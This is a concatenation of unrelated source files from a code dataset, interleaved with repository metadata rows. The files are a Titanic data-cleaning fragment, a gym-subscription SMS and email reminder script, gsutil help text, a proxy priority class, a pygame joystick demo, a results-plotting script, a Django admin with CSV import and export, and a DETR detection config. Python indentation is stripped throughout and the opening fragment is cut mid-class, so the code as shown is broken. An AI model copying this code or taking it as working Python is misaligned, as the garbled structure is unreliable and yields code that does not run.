def estimate_age(self):
def extract_title(self):
"""[summary]
"""
self.Xy["title"] = (
self.Xy.name.apply(lambda x: HumanName(x).title)
.replace(self.title_translator)
.replace({"\.": ""}, regex=True)
)
def extract_last_name(self):
self.Xy["last_name"] = self.Xy.name.apply(lambda x: HumanName(x).last)
def clean(self,):
"""Clean data to remove missing data and "unnecessary" features.
Arguments:
in_raw_df {pd.DataFrame} -- Dataframe containing all columns and rows Kaggle Titanic Training Data set
"""
self.Xy = self.Xy_raw.drop(self.drop_columns, axis=1)
| 26.978022
| 114
| 0.524644
|
3666c993ff811cb5f245c2bc6e0c20a84885f945
| 6,082
|
py
|
Python
|
CheckSubscription.py
|
SaiVikhyath/FitnessGarage
|
e345d295e13f6ba307d324203c9c62e7ea2f79e7
|
[
"MIT"
] | 1
|
2021-12-20T21:00:07.000Z
|
2021-12-20T21:00:07.000Z
|
CheckSubscription.py
|
SaiVikhyath/FitnessGarage
|
e345d295e13f6ba307d324203c9c62e7ea2f79e7
|
[
"MIT"
] | null | null | null |
CheckSubscription.py
|
SaiVikhyath/FitnessGarage
|
e345d295e13f6ba307d324203c9c62e7ea2f79e7
|
[
"MIT"
] | null | null | null |
import psycopg2
import smtplib
import logging
import datetime
import requests
import json
from dateutil.relativedelta import relativedelta
SERVER = "smtp.gmail.com"
PORT = 587
FROM = "fitnessgaragehyd@gmail.com"
SUBJECT = "GYM SUBSCRIPTION ENDING"
smsURL = "https://www.fast2sms.com/dev/bulkV2"
numbersList = ""
aboutToEndData = {}
endsData = {}
subscriptionEndsList = []
try:
logging.basicConfig(filename="CheckSubscriptionLog.log", format="%(asctime)s %(message)s", filemode="a")
logger = logging.getLogger()
logger.setLevel(logging.DEBUG)
except:
print("Unable to open log file")
try:
con = psycopg2.connect(database="*********", user="*********", password="*********", host="127.0.0.1", port="5432")
except:
logger.error("DB connection failed!!!")
cur = con.cursor()
detailsQuery = "select * from GymMembers;"
cur.execute(detailsQuery)
gymDetails = cur.fetchall()
for i in gymDetails:
regNo = i[0]
name = i[1]
mobileNo = i[2]
emailID = i[3]
subscriptionDuration = i[5]
subscriptionStartDate = datetime.datetime.fromtimestamp(int(i[4]))
subscriptionStartDate = subscriptionStartDate.date()
subscriptionEndDate = datetime.datetime.fromtimestamp(int(i[4])) + relativedelta(months=int(i[5]))
subscriptionEndDate = subscriptionEndDate.date()
reminderDate = subscriptionEndDate + relativedelta(days=-3)
today = datetime.datetime.now().date()
print("RECEIPT NO : ", regNo)
print("NAME : ", name)
print("MOBILE NUMBER : ", mobileNo)
print("EMAIL ID : ", emailID)
print("SUBSCRIPTION START : ", subscriptionStartDate)
print("SUBSCRIPTION END : ", subscriptionEndDate)
print("REMINDER DATE : ", reminderDate)
print("TODAY : ", today)
if today >= reminderDate:
if today > subscriptionEndDate:
print("ENDED ON : ", subscriptionEndDate)
if int(str(today - subscriptionEndDate).split(" ")[0]) >= 3:
cur.execute("delete from GymMembers where phonenumber=(%s)",(mobileNo,))
con.commit()
elif today < subscriptionEndDate:
endsIndays = str(subscriptionEndDate - today).split(',')[0]
aboutToEndData = {
"route" : "v3",
"sender_id" : "FitnessGarage",
"message" : "\n" + name + "\n\nThis is to notify you that your gym subscription ends in " + endsIndays + ". Please renew your subscription.\n\nThanks & Regards\nPraveen Yadav\nFitness Garage\n\n",
"language" : "english",
"flash" : 0,
"numbers" : mobileNo,
}
headers = {
"authorization" : "************",
"Content-Type" : "application/x-www-form-urlencoded",
"Cache-Control" : "no-cache"
}
response = requests.request("POST", smsURL, data=aboutToEndData, headers=headers)
msg = json.loads(response.text)
print(msg)
print("Ends in " + endsIndays)
BODY = "\n\n\nHello " + name + ", \n\nThis is to notify you that your gym subscription ends in " + endsIndays + ". Please renew your subscription.\n\nThanks & Regards\nPraveen Yadav\nFitness Garage\n\n"
message = """From: %s\r\nTo: %s\nSubject: %s\n\n\n%s""" % (FROM, emailID, SUBJECT, BODY)
server = smtplib.SMTP_SSL(SERVER, 465)
server.login(FROM, "********")
server.sendmail(FROM, emailID, message)
server.quit()
else:
endsData = {
"route" : "v3",
"sender_id" : "FitnessGarage",
"message" : "\n" + name + "\n\nThis is to notify you that your gym subscription ends today. Please renew your subscription.\n\nThanks & Regards\nPraveen Yadav\nFitness Garage",
"language" : "english",
"flash" : 0,
"numbers" : mobileNo,
}
headers = {
"authorization" : "***********",
"Content-Type" : "application/x-www-form-urlencoded",
"Cache-Control" : "no-cache"
}
response = requests.request("POST", smsURL, data=endsData, headers=headers)
msg = json.loads(response.text)
print(msg)
print("ENDS TODAY : ", subscriptionEndDate)
subscriptionEndsList.append(name)
BODY = "Hello " + name + ", \n\n\tThis is to notify you that your gym subscription ends today. Please renew your subscription.\n\nThanks & Regards\nPraveen Yadav\nFitness Garage"
message = """From: %s\r\nTo: %s\nSubject: %s\n\n\n%s""" % (FROM, emailID, SUBJECT, BODY)
server = smtplib.SMTP_SSL(SERVER, 465)
server.login(FROM, "***********")
server.sendmail(FROM, emailID, message)
server.quit()
else:
print("SUBSCRIPTION NOT ENDING IN NEXT 7 DAYS!!")
subscriptionEndsString = ", ".join(subscriptionEndsList)
subscriptionEndsData = {
"route" : "v3",
"sender_id" : "FitnessGarage",
"message" : "\nPraveen\n\nThis is to notify you that the following customer's gym subscription ends today.\n\nNames : "+ subscriptionEndsString +"\n\nThanks\nFitness Garage",
"language" : "english",
"flash" : 0,
"numbers" : mobileNo,
}
headers = {
"authorization" : "*************",
"Content-Type" : "application/x-www-form-urlencoded",
"Cache-Control" : "no-cache"
}
if subscriptionEndsList:
response = requests.request("POST", smsURL, data=subscriptionEndsData, headers=headers)
msg = json.loads(response.text)
print("\n\n\n" + str(msg))
BODY = "Hello Praveen\n\n\tThis is to notify you that the following customer's gym subscription ends today.\n\nNames : "+ subscriptionEndsString +"\n\nThanks\nFitness Garage"
message = """From: %s\r\nTo: %s\nSubject: %s\n\n\n%s""" % (FROM, FROM, "SUBSCRIPTIONS ENDING TODAY", BODY)
server = smtplib.SMTP_SSL(SERVER, 465)
server.login(FROM, "**********")
server.sendmail(FROM, FROM, message)
server.quit()
| 41.37415
| 214
| 0.603256
|
b2790878b2079935af79aebec00dc82ff33bb3eb
| 6,378
|
py
|
Python
|
platform/gsutil/gslib/addlhelp/command_opts.py
|
IsaacHuang/google-cloud-sdk
|
52afa5d1a75dff08f4f5380c5cccc015bf796ca5
|
[
"Apache-2.0"
] | null | null | null |
platform/gsutil/gslib/addlhelp/command_opts.py
|
IsaacHuang/google-cloud-sdk
|
52afa5d1a75dff08f4f5380c5cccc015bf796ca5
|
[
"Apache-2.0"
] | null | null | null |
platform/gsutil/gslib/addlhelp/command_opts.py
|
IsaacHuang/google-cloud-sdk
|
52afa5d1a75dff08f4f5380c5cccc015bf796ca5
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# Copyright 2012 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Additional help about gsutil command-level options."""
from __future__ import absolute_import
from gslib.help_provider import HelpProvider
_DETAILED_HELP_TEXT = ("""
<B>SYNOPSIS</B>
Top-level gsutil Options
<B>DESCRIPTION</B>
gsutil supports separate options for the top-level gsutil command and
the individual sub-commands (like cp, rm, etc.) The top-level options
control behavior of gsutil that apply across commands. For example, in
the command:
gsutil -m cp -p file gs://bucket/obj
the -m option applies to gsutil, while the -p option applies to the cp
sub-command.
<B>OPTIONS</B>
-D Shows HTTP requests/headers and additional debug info needed when
posting support requests.
-DD Shows HTTP requests/headers, additional debug info plus HTTP
upstream payload.
-h Allows you to specify certain HTTP headers, for example:
gsutil -h "Cache-Control:public,max-age=3600" \\
-h "Content-Type:text/html" cp ...
Note that you need to quote the headers/values that
contain spaces (such as "Content-Disposition: attachment;
filename=filename.ext"), to avoid having the shell split them
into separate arguments.
The following headers are supported:
Cache-Control
Content-Disposition
Content-Encoding
Content-Language
Content-MD5
Content-Type
Custom metadata headers with a matching Cloud Storage Provider
prefix, such as:
x-goog-meta-
Note that for gs:// URLs, the Cache Control header is specific to
the API being used. The XML API will accept any cache control
headers and return them during object downloads. The JSON API
respects only the public, private, no-cache, and max-age cache
control headers, and may add its own no-transform directive even
if it was not specified. See 'gsutil help apis' for more
information on gsutil's interaction with APIs.
See also "gsutil help setmeta" for the ability to set metadata
fields on objects after they have been uploaded.
-m Causes supported operations (acl ch, acl set, cp, mv, rm, rsync,
and setmeta) to run in parallel. This can significantly improve
performance if you are performing operations on a large number of
files over a reasonably fast network connection.
gsutil performs the specified operation using a combination of
multi-threading and multi-processing, using a number of threads
and processors determined by the parallel_thread_count and
parallel_process_count values set in the boto configuration
file. You might want to experiment with these values, as the
best values can vary based on a number of factors, including
network speed, number of CPUs, and available memory.
Using the -m option may make your performance worse if you
are using a slower network, such as the typical network speeds
offered by non-business home network plans. It can also make
your performance worse for cases that perform all operations
locally (e.g., gsutil rsync, where both source and desination URLs
are on the local disk), because it can "thrash" your local disk.
If a download or upload operation using parallel transfer fails
before the entire transfer is complete (e.g. failing after 300 of
1000 files have been transferred), you will need to restart the
entire transfer.
Also, although most commands will normally fail upon encountering
an error when the -m flag is disabled, all commands will
continue to try all operations when -m is enabled with multiple
threads or processes, and the number of failed operations (if any)
will be reported at the end of the command's execution.
WARNING: If you use the gsutil -m option when copying data
between versioned buckets, object version ordering will not be
preserved. For more information see the
"COPYING VERSIONED BUCKETS" section under
'gsutil help versions'.
-o Set/override values in the boto configuration value, in the format
<section>:<name>=<value>, e.g. gsutil -o "Boto:proxy=host" ...
This will not pass the option to gsutil integration tests, which
run in a separate process.
-q Causes gsutil to perform operations quietly, i.e., without
reporting progress indicators of files being copied or removed,
etc. Errors are still reported. This option can be useful for
running gsutil from a cron job that logs its output to a file, for
which the only information desired in the log is failures.
-s Tells gsutil to use a simulated storage provider (for testing).
""")
class CommandOptions(HelpProvider):
"""Additional help about gsutil command-level options."""
# Help specification. See help_provider.py for documentation.
help_spec = HelpProvider.HelpSpec(
help_name='options',
help_name_aliases=['arg', 'args', 'cli', 'opt', 'opts'],
help_type='additional_help',
help_one_line_summary='Top-Level Command-Line Options',
help_text=_DETAILED_HELP_TEXT,
subcommand_help_text={},
)
| 44.915493
| 80
| 0.657259
|
86a112eaa41860f75b974e7275f9eea83ca37199
| 2,414
|
py
|
Python
|
corescrape/proxy/proxy.py
|
anewmanvs/corescrape
|
3162f7f29ca2fe1786a28e05864c3099a7a19ae0
|
[
"MIT"
] | null | null | null |
corescrape/proxy/proxy.py
|
anewmanvs/corescrape
|
3162f7f29ca2fe1786a28e05864c3099a7a19ae0
|
[
"MIT"
] | null | null | null |
corescrape/proxy/proxy.py
|
anewmanvs/corescrape
|
3162f7f29ca2fe1786a28e05864c3099a7a19ae0
|
[
"MIT"
] | null | null | null |
"""
Proxy
IMPORTANT:
* Make sure you ALWAYS use ELITE proxies, otherwise you are exposed
"""
# pylint: disable=invalid-name, too-many-instance-attributes
from core.exceptions import CoreScrapeInvalidProxy
class Proxy:
"""Defines a proxy and its useful methods"""
def __init__(self, address):
"""Constructor."""
self.ready = False # should always be the first
self.address = address
self.numtries = 0
try:
self.__ip, self.__port = address.split(':')
except ValueError:
raise CoreScrapeInvalidProxy
self.priority = 10
# Maximum number of hits on a row. After this, the up_priority will
# instead be a 'down_priority' to avoid reusing too much the same proxy.
self.max_on_a_row = 3
self.on_a_row = 0 # number of hits on a row
self.ready = True # should always be the last
def requests_formatted(self):
"""Returns the proxy in requests formatting."""
return {protocol: self.address for protocol in ['http', 'https']}
def add_up_try(self):
"""Add up a try"""
self.numtries += 1
self.down_priority()
return self.numtries
def up_priority(self, weight=1):
"""Set higher priority to this proxy"""
if self.on_a_row > self.max_on_a_row:
# Number of maximum hits reached. The informed weight is ignored here
self.down_priority(self.max_on_a_row + 1)
return
if self.priority > 0:
self.priority -= weight
self.on_a_row += 1
def down_priority(self, weight=1):
"""Set lower priority to this proxy"""
self.priority += weight
self.on_a_row = 0
def ip(self):
"""Returns the IP"""
return self.__ip
def port(self):
"""Returns the port"""
return self.__port
def num_tries(self):
"""Number of tries this proxy has made"""
return self.numtries
def __str__(self):
"""To string"""
return self.address
def __bool__(self):
"""Points if this proxy is ready"""
return self.ready
def __eq__(self, other):
"""Equality between two proxies"""
return self.priority == other.priority
def __lt__(self, other):
"""Less than two proxies"""
return self.priority < other.priority
| 24.383838
| 81
| 0.600249
|
101e13aa6d0f1dd3929809231f4c1322759ccbd8
| 2,102
|
py
|
Python
|
demo_joystick01.py
|
svdmaar/pygame_demos
|
8fb599134ba9db7c833a53fdc152ef0784f6c4b9
|
[
"MIT"
] | null | null | null |
demo_joystick01.py
|
svdmaar/pygame_demos
|
8fb599134ba9db7c833a53fdc152ef0784f6c4b9
|
[
"MIT"
] | null | null | null |
demo_joystick01.py
|
svdmaar/pygame_demos
|
8fb599134ba9db7c833a53fdc152ef0784f6c4b9
|
[
"MIT"
] | null | null | null |
import Demo
import pygame
# https://www.pygame.org/docs/ref/joystick.html
# TODO: "hats"
class Demo_Joystick01(Demo.Demo):
def setup(self, screen):
super().setup(screen)
self.joystickCount = pygame.joystick.get_count()
defaultFontName = pygame.font.get_default_font()
fontSize = 30
self.font01 = pygame.font.SysFont(defaultFontName, fontSize)
self.countSurface = self.font01.render("Joystick count: " + str(self.joystickCount), False, (0, 0, 0))
if self.joystickCount > 0:
self.joystick0 = pygame.joystick.Joystick(0)
self.joystickNameSurface0 = self.font01.render(self.joystick0.get_name(), False, (0, 0, 0))
self.axisCount0 = self.joystick0.get_numaxes()
self.axisSurface0 = self.font01.render("Axis count: " + str(self.axisCount0), False, (0, 0, 0))
self.buttonCount0 = self.joystick0.get_numbuttons()
self.buttonSurface0 = self.font01.render("Button count: " + str(self.buttonCount0), False, (0, 0, 0))
def render(self):
# TODO: do we need to free these font surfaces?
textY = 0
self.screen.blit(self.countSurface, (0, 0))
if self.joystickCount == 0:
return
textY += 30
self.screen.blit(self.joystickNameSurface0, (0, textY))
textY += 30
self.screen.blit(self.axisSurface0, (0, textY))
for i in range(self.axisCount0):
axisStr = str(self.joystick0.get_axis(i))
axisTextSurface = self.font01.render(axisStr, False, (0, 0, 0))
textY += 30
self.screen.blit(axisTextSurface, (0, textY))
textY += 30
self.screen.blit(self.buttonSurface0, (0, textY))
for i in range(self.buttonCount0):
buttonStr = str(self.joystick0.get_button(i))
buttonTextSurface = self.font01.render(buttonStr, False, (0, 0, 0))
textY += 30
self.screen.blit(buttonTextSurface, (0, textY))
def getName(self):
return "joystick01: shows input of first joystick (if available)"
| 41.215686
| 113
| 0.620837
|
075a96e3e1cafb4f4ce71ec323a328a775945e80
| 5,840
|
py
|
Python
|
src/graficos/graficar_vecinos_10_a_100.py
|
ilebrero/Metodos-TP2
|
e44a6538cfec5eb16b294cd2371870c265dba451
|
[
"MIT"
] | null | null | null |
src/graficos/graficar_vecinos_10_a_100.py
|
ilebrero/Metodos-TP2
|
e44a6538cfec5eb16b294cd2371870c265dba451
|
[
"MIT"
] | null | null | null |
src/graficos/graficar_vecinos_10_a_100.py
|
ilebrero/Metodos-TP2
|
e44a6538cfec5eb16b294cd2371870c265dba451
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import numpy as np
import matplotlib.pyplot as plt
from math import log
y_f1 = []
y_f1_promedio = []
y_hitrate = []
y_hitrate_promedio = []
y_recalls = []
y_recalls_promedio_iteracion = []
y_recalls_promedio_clase = []
y_precision = []
y_precision_promedio_iteracion = []
y_precision_promedio_clase = []
y_tiempo = []
# MODIFICAR EN CASO DE QUERER DISTINTOS VALORES EN EL EJE X DEL GRAFICOS
# x_clase sería las iteraciones que se hacen variando el valor que se varíe
x_clase = [10, 20, 30, 40, 50, 60, 70, 80, 90, 100] # Por ejemplo aca varío los vecinos de 10 a 100
K = 10 # K del k-cross-folding
cant_iteraciones = len(x_clase) # modificar x. RANGO DE VARIABLE
# x_iteracion es para gráficar, por cada iteración de la variable siendo modificada, cada iteración del K-cross-folding
# Por eso se calcula como cant_iteraciones * K
x_iteracion = []
a = 10
for j in range(0, cant_iteraciones):
for i in range (0, K):
x_iteracion.append(a)
a += 10
# MODIFICAR EL NOMBRE DE LA CARPETA DE DONDE LEER LOS DATOS (y la extension del archivo, yo flashee y les puse .tex)
# Ejemplo:
# f = open('../resultados/MI_CARPETA/f1.tex', 'r')
promedio = 0
f = open('../resultados/PLSDA_vecinos_10_a_100_dimension_10/f1.tex', 'r')
for j in range(0, cant_iteraciones):
for i in range(0, K):
aux = float(f.readline()[:-1])
promedio += aux
y_f1.append(aux)
promedio /= K
y_f1_promedio.append(promedio)
promedio = 0
f = open('../resultados/PLSDA_vecinos_10_a_100_dimension_10/hitrate.tex', 'r')
promedio = 0
for j in range(0, cant_iteraciones):
for i in range(0, K):
aux = float(f.readline()[:-1])
promedio += aux
y_hitrate.append(aux)
promedio /= K
y_hitrate_promedio.append(promedio)
promedio = 0
f = open('../resultados/PLSDA_vecinos_10_a_100_dimension_10/recalls.tex', 'r')
prom = 0
for j in range(0, cant_iteraciones):
for i in range(0, K):
for z in range(0, 10):
y_recalls.append(float(f.readline()[:-1]))
promedio = float(f.readline()[:-1])
prom += promedio
y_recalls_promedio_iteracion.append(promedio)
prom /= K
y_recalls_promedio_clase.append(prom)
prom = 0
f = open('../resultados/PLSDA_vecinos_10_a_100_dimension_10/precisiones.tex', 'r')
for j in range(0, cant_iteraciones):
for i in range(0, K):
for z in range(0, 10):
y_precision.append(float(f.readline()[:-1]))
promedio = float(f.readline()[:-1])
prom += promedio
y_precision_promedio_iteracion.append(promedio)
prom /= K
y_precision_promedio_clase.append(prom)
prom = 0
# DESCOMENTAR EN CASO DE HABER HECHO ADEMAS TOMA DE TIEMPOS
#promedio = 0
#f = open('../resultados/PLSDA_vecinos_10_a_100_dimension_10/tiempos.tex', 'r')
#for j in range(0, cant_iteraciones):
# for i in range(0, K):
# promedio += float(f.readline()[:-1])
#
# promedio /= K
# y_tiempo.append(promedio)
# promedio = 0
# PARA QUE SE GUARDEN LAS IMAGENES ES NECESARIO CREAR UNA CARPETA DENTRO DE SUS RESULTADOS QUE SE LLAME "graficos"
# Ejemplo:
# plt.savefig('../resultados/MI_CARPETA/graficos/precisiones_clase.png')
# PRIMER IMAGEN
error_config = {'ecolor': '0.3'}
bar_width = 0.96
opacity = 0.4
plt.plot(x_clase, y_precision_promedio_clase, 'ro', #bar_width,
alpha=opacity,
color='b',
#error_kw=error_config,
label=u"Precisión del categorizador")
plt.xlabel(u"cantidad de vecinos")
plt.ylabel(u"Precisión")
plt.legend()
plt.savefig('../resultados/PLSDA_vecinos_10_a_100_dimension_10/graficos/precisiones_clase.png')
plt.show()
# SEGUNDA IMAGEN
plt.plot(x_iteracion, y_precision_promedio_iteracion, 'ro', #bar_width,
alpha=opacity,
color='b',
label=u"Precisión del categorizador por clase")
plt.xlabel(u"cantidad de vecinos")
plt.ylabel(u"Precisión")
plt.legend()
plt.tight_layout()
plt.savefig('../resultados/PLSDA_vecinos_10_a_100_dimension_10/graficos/precisiones_iteracion.png')
plt.show()
# TERCER IMAGEN
plt.plot(x_clase, y_recalls_promedio_clase, 'ro', #bar_width,
alpha=opacity,
color='b',
label=u"recall del categorizador")
plt.xlabel(u"cantidad de vecinos")
plt.ylabel(u"Recall")
plt.legend()
plt.tight_layout()
plt.savefig('../resultados/PLSDA_vecinos_10_a_100_dimension_10/graficos/recall_clase.png')
plt.show()
# CUARTA IMAGEN
plt.plot(x_iteracion, y_recalls_promedio_iteracion, 'ro', #bar_width,
alpha=opacity,
color='b',
label=u"recall del categorizador por clase")
plt.xlabel(u"cantidad de vecinos")
plt.ylabel(u"Recall")
plt.legend()
plt.tight_layout()
plt.savefig('../resultados/PLSDA_vecinos_10_a_100_dimension_10/graficos/recall_iteracion.png')
plt.show()
# QUINTA IMAGEN
plt.plot(x_clase, y_hitrate_promedio, 'ro', #bar_width,
alpha=opacity,
color='b',
label=u"Hit rate del categorizador")
plt.xlabel(u"cantidad de vecinos")
plt.ylabel(u"Hit rate")
plt.legend()
plt.tight_layout()
plt.savefig('../resultados/PLSDA_vecinos_10_a_100_dimension_10/graficos/hitrate_promedio.png')
plt.show()
# SEXTA IMAGEN
plt.plot(x_clase, y_f1_promedio, 'ro', #bar_width,
alpha=opacity,
color='b',
label=u"F1 del categorizador")
plt.xlabel(u"cantidad de vecinos")
plt.ylabel(u"F1")
plt.legend()
plt.tight_layout()
plt.savefig('../resultados/PLSDA_vecinos_10_a_100_dimension_10/graficos/F1_promedio.png')
plt.show()
# SEPTIMA IMAGEN
# DESCOMENTAR EN CASO DE HACER TOMA DE TIEMPOS
#plt.plot(x_clase, y_tiempo, 'ro', #bar_width,
# alpha=opacity,
# color='b',
# label=u"Tiempo del PLSDA+kNN")
#
#plt.xlabel(u"cantidad de vecinos")
#plt.ylabel(u"tiempo")
#plt.legend()
#
#plt.tight_layout()
#plt.savefig('../resultados/PLSDA_vecinos_10_a_100_dimension_10/graficos/tiempos.png')
#plt.show()
| 25.955556
| 119
| 0.702226
|
8c09c9d4e928a8018caea654581182fda804df43
| 3,548
|
py
|
Python
|
cride/circles/admin.py
|
blueleus/cride
|
8723fc9eeda540b8b7b377270479bc4ae2969ad5
|
[
"MIT"
] | null | null | null |
cride/circles/admin.py
|
blueleus/cride
|
8723fc9eeda540b8b7b377270479bc4ae2969ad5
|
[
"MIT"
] | null | null | null |
cride/circles/admin.py
|
blueleus/cride
|
8723fc9eeda540b8b7b377270479bc4ae2969ad5
|
[
"MIT"
] | null | null | null |
"""Circle models admin."""
# Django
from django.contrib import admin
from django.http import HttpResponse
# Models
from cride.circles.models import Circle
from cride.rides.models import Ride
# Forms
from .forms import UploadFileForm
# Utilities
# Utilities
import csv
from django.utils import timezone
from datetime import datetime, timedelta
from io import TextIOWrapper
from django.urls import path
from django.shortcuts import render
@admin.register(Circle)
class CircleAdmin(admin.ModelAdmin):
"""Circle model admin."""
list_display = (
'slug_name',
'name',
'is_public',
'verified',
'is_limited',
'members_limit'
)
search_fields = ('slug_name', 'name')
list_filter = (
'is_public',
'verified',
'is_limited'
)
actions = ['make_verified', 'make_unverified', 'download_todays_rides']
def make_verified(self, request, queryset):
"""Make circles verified."""
queryset.update(verified=True)
make_verified.short_description = 'Make selected circles verified'
def make_unverified(self, request, queryset):
"""Make circles unverified."""
queryset.update(verified=False)
make_unverified.short_description = 'Make selected circles unverified'
def get_urls(self):
urls = super(CircleAdmin, self).get_urls()
custom_urls = [
path('import-csv/', self.import_csv)
]
return custom_urls + urls
def import_csv(self, request):
if request.method == 'POST':
form = UploadFileForm(request.POST, request.FILES)
if form.is_valid():
self.handle_import_csv(request.FILES['file'])
self.message_user(request, "Your csv file has been imported")
else:
form = UploadFileForm()
return render(request, 'admin/circles/circle/csv_form.html', {'form': form})
def handle_import_csv(self, f):
# For more information:
# https://stackoverflow.com/questions/16243023/how-to-resolve-iterator-should-return-strings-not-bytes
file = TextIOWrapper(f.file, encoding='utf-8')
reader = csv.DictReader(file)
for row in reader:
circle = Circle(**row)
circle.save()
def download_todays_rides(self, request, queryset):
"""Return today's rides."""
now = timezone.now()
start = datetime(now.year, now.month, now.day, 0, 0, 0)
end = start + timedelta(days=1)
rides = Ride.objects.filter(
offered_in__in=queryset.values_list('id'),
departure_date__gte=start,
departure_date__lte=end
).order_by('departure_date')
response = HttpResponse(content_type='text/csv')
response['Content-Disposition'] = 'attachment; filename="rides.csv"'
writer = csv.writer(response)
writer.writerow([
'id',
'passengers',
'departure_location',
'departure_date',
'arrival_location',
'arrival_date',
'rating',
])
for ride in rides:
writer.writerow([
ride.pk,
ride.passengers.count(),
ride.departure_location,
str(ride.departure_date),
ride.arrival_location,
str(ride.arrival_date),
ride.rating,
])
return response
download_todays_rides.short_description = 'Download todays rides'
| 29.566667
| 110
| 0.610203
|
6f7e365a4d32d5ec9d122d369fd1cf9fed9d671e
| 6,398
|
py
|
Python
|
configs/detr/detr_r50_4x16_5e_output_heads_only.py
|
colinski/mmdetection
|
c1526855590c33886c52f8651dad86a32c0f38fd
|
[
"Apache-2.0"
] | null | null | null |
configs/detr/detr_r50_4x16_5e_output_heads_only.py
|
colinski/mmdetection
|
c1526855590c33886c52f8651dad86a32c0f38fd
|
[
"Apache-2.0"
] | null | null | null |
configs/detr/detr_r50_4x16_5e_output_heads_only.py
|
colinski/mmdetection
|
c1526855590c33886c52f8651dad86a32c0f38fd
|
[
"Apache-2.0"
] | null | null | null |
_base_ = [
'../_base_/datasets/coco_detection.py', '../_base_/default_runtime.py'
]
#import os
#checkpoint = '%s/checkpoints/detr_r50_8x2_150e_coco_no_output_heads.pth' % os.environ['WORK']
#checkpoint = '/work/mvadera_umass_edu/checkpoints/detr_r50_8x2_150e_coco_no_output_heads.pth'
checkpoint = '/work/csamplawski_umass_edu/checkpoints/detr_r50_8x2_150e_coco_no_output_heads.pth'
model = dict(
type='DETR',
freeze_backbone=True,
init_cfg=dict(type='Pretrained', checkpoint=checkpoint),
backbone=dict(
type='ResNet',
depth=50,
num_stages=4,
out_indices=(3, ),
frozen_stages=1,
norm_cfg=dict(type='BN', requires_grad=False),
norm_eval=True,
style='pytorch',
init_cfg=dict(type='Pretrained', checkpoint='torchvision://resnet50')),
bbox_head=dict(
type='DETRHead',
num_classes=80,
in_channels=2048,
#freeze_transformer=True,
freeze_proj=True,
transformer=dict(
type='Transformer',
freeze_encoder=True,
freeze_decoder=True,
encoder=dict(
type='DetrTransformerEncoder',
num_layers=6,
transformerlayers=dict(
type='BaseTransformerLayer',
attn_cfgs=[
dict(
type='MultiheadAttention',
embed_dims=256,
num_heads=8,
dropout=0.1)
],
feedforward_channels=2048,
ffn_dropout=0.1,
operation_order=('self_attn', 'norm', 'ffn', 'norm'))),
decoder=dict(
type='DetrTransformerDecoder',
return_intermediate=True,
num_layers=6,
transformerlayers=dict(
type='DetrTransformerDecoderLayer',
attn_cfgs=dict(
type='MultiheadAttention',
embed_dims=256,
num_heads=8,
dropout=0.1),
feedforward_channels=2048,
ffn_dropout=0.1,
operation_order=('self_attn', 'norm', 'cross_attn', 'norm',
'ffn', 'norm')),
)),
positional_encoding=dict(
type='SinePositionalEncoding', num_feats=128, normalize=True),
loss_cls=dict(
type='CrossEntropyLoss',
bg_cls_weight=0.1,
use_sigmoid=False,
loss_weight=1.0,
class_weight=1.0),
loss_bbox=dict(type='L1Loss', loss_weight=5.0),
loss_iou=dict(type='GIoULoss', loss_weight=2.0)),
# training and testing settings
train_cfg=dict(
assigner=dict(
type='HungarianAssigner',
cls_cost=dict(type='ClassificationCost', weight=1.),
reg_cost=dict(type='BBoxL1Cost', weight=5.0, box_format='xywh'),
iou_cost=dict(type='IoUCost', iou_mode='giou', weight=2.0))),
test_cfg=dict(max_per_img=100))
img_norm_cfg = dict(
mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True)
# train_pipeline, NOTE the img_scale and the Pad's size_divisor is different
# from the default setting in mmdet.
train_pipeline = [
dict(type='LoadImageFromFile'),
dict(type='LoadAnnotations', with_bbox=True),
dict(type='RandomFlip', flip_ratio=0.5),
dict(
type='AutoAugment',
policies=[[
dict(
type='Resize',
img_scale=[(480, 1333), (512, 1333), (544, 1333), (576, 1333),
(608, 1333), (640, 1333), (672, 1333), (704, 1333),
(736, 1333), (768, 1333), (800, 1333)],
multiscale_mode='value',
keep_ratio=True)
],
[
dict(
type='Resize',
img_scale=[(400, 1333), (500, 1333), (600, 1333)],
multiscale_mode='value',
keep_ratio=True),
dict(
type='RandomCrop',
crop_type='absolute_range',
crop_size=(384, 600),
allow_negative_crop=True),
dict(
type='Resize',
img_scale=[(480, 1333), (512, 1333), (544, 1333),
(576, 1333), (608, 1333), (640, 1333),
(672, 1333), (704, 1333), (736, 1333),
(768, 1333), (800, 1333)],
multiscale_mode='value',
override=True,
keep_ratio=True)
]]),
dict(type='Normalize', **img_norm_cfg),
dict(type='Pad', size_divisor=1),
dict(type='DefaultFormatBundle'),
dict(type='Collect', keys=['img', 'gt_bboxes', 'gt_labels'])
]
# test_pipeline, NOTE the Pad's size_divisor is different from the default
# setting (size_divisor=32). While there is little effect on the performance
# whether we use the default setting or use size_divisor=1.
test_pipeline = [
dict(type='LoadImageFromFile'),
dict(
type='MultiScaleFlipAug',
img_scale=(1333, 800),
flip=False,
transforms=[
dict(type='Resize', keep_ratio=True),
dict(type='RandomFlip'),
dict(type='Normalize', **img_norm_cfg),
dict(type='Pad', size_divisor=1),
dict(type='ImageToTensor', keys=['img']),
dict(type='Collect', keys=['img'])
])
]
data = dict(
samples_per_gpu=16,
workers_per_gpu=2,
train=dict(pipeline=train_pipeline),
val=dict(pipeline=test_pipeline),
test=dict(pipeline=test_pipeline))
# optimizer
optimizer = dict(
type='AdamW',
lr=0.0001,
weight_decay=0.0001,
paramwise_cfg=dict(
custom_keys={'backbone': dict(lr_mult=0.1, decay_mult=1.0)}))
optimizer_config = dict(grad_clip=dict(max_norm=0.1, norm_type=2))
# learning policy
lr_config = dict(policy='step', step=[4])
runner = dict(type='EpochBasedRunner', max_epochs=5)
find_unused_parameters=True
| 39.012195
| 97
| 0.527352
|
30d656ad469e17fbcc09ac5b61fb35bd1ab10514
| 5,574
|
py
|
Python
|
tests/dot11/test_FrameManagementDisassociation.py
|
S3bastian/impacket
|
